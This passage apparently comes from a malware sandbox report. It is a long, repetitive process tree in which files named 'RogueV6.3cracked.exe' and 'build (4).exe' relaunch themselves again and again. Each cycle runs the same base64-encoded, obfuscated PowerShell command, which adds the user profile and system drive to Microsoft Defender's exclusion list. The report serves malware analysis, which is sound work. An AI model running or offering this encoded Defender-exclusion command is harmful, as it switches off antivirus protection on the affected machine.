        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        167⤵
        
        PID:1548
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        168⤵
        
        PID:6476
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        168⤵
        
        PID:9408
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        168⤵
        
        PID:3616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        169⤵
        
        PID:7700
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        169⤵
        
        PID:6212
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        169⤵
        
        PID:5476
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        170⤵
        
        PID:9448
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        170⤵
        
        PID:9420
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        170⤵
        
        PID:7760
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        171⤵
        
        PID:10100
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        171⤵
        
        PID:9904
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        171⤵
        
        PID:10040
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        172⤵
        System Location Discovery: System Language Discovery
        
        PID:1080
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        172⤵
        
        PID:5808
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        172⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        173⤵
        
        PID:10200
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        173⤵
        
        PID:5432
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        173⤵
        
        PID:5964
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        174⤵
        
        PID:5956
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        174⤵
        
        PID:9388
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        174⤵
        System Location Discovery: System Language Discovery
        
        PID:6660
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        175⤵
        
        PID:440
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        176⤵
        
        PID:8900
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        175⤵
        System Location Discovery: System Language Discovery
        
        PID:5900
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        175⤵
        
        PID:1484
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        176⤵
        
        PID:4456
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        176⤵
        
        PID:4876
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        176⤵
        
        PID:6028
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        177⤵
        
        PID:7216
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        177⤵
        
        PID:2300
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        177⤵
        
        PID:6204
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        178⤵
        
        PID:5920
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        178⤵
        
        PID:3372
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        178⤵
        
        PID:3732
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        179⤵
        
        PID:1060
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        179⤵
        
        PID:6872
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        179⤵
        
        PID:4560
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        180⤵
        
        PID:9224
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        180⤵
        
        PID:9336
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        180⤵
        
        PID:10236
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        181⤵
        
        PID:8796
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        181⤵
        
        PID:4696
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        181⤵
        
        PID:6436
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        182⤵
        
        PID:8016
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        182⤵
        System Location Discovery: System Language Discovery
        
        PID:6200
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        182⤵
        
        PID:7708
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        183⤵
        
        PID:5744
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        183⤵
        
        PID:9612
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        183⤵
        
        PID:6272
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        184⤵
        
        PID:3928
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        184⤵
        
        PID:3128
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        184⤵
        
        PID:7904
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        185⤵
        
        PID:9484
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        185⤵
        
        PID:5240
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        185⤵
        
        PID:9876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        186⤵
        
        PID:8880
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        186⤵
        
        PID:9872
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        186⤵
        
        PID:6396
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        187⤵
        
        PID:9624
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        187⤵
        
        PID:9488
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        187⤵
        
        PID:9064
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        188⤵
        
        PID:9280
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        188⤵
        
        PID:6796
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        188⤵
        
        PID:9304
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        189⤵
        
        PID:9184
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        189⤵
        
        PID:5972
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        189⤵
        
        PID:9208
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        190⤵
        
        PID:6520
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        190⤵
        
        PID:8736
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        190⤵
        
        PID:9876
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        191⤵
        
        PID:7604
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        191⤵
        
        PID:9204
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        191⤵
        
        PID:7120
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        192⤵
        
        PID:6136
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        192⤵
        
        PID:9952
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        192⤵
        
        PID:8952
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        193⤵
        
        PID:10148
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        193⤵
        
        PID:5572
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        193⤵
        
        PID:9920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAdAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGYAZgB6ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdgBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGgAZgBtACMAPgA="
        194⤵
        
        PID:7008
        
        C:\Users\Admin\AppData\Local\Temp\build (4).exe
        
        "C:\Users\Admin\AppData\Local\Temp\build (4).exe"
        194⤵
        
        PID:7664
        
        C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe
        
        "C:\Users\Admin\AppData\Local\Temp\RogueV6.3cracked.exe"
        194⤵
        
        PID:956
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
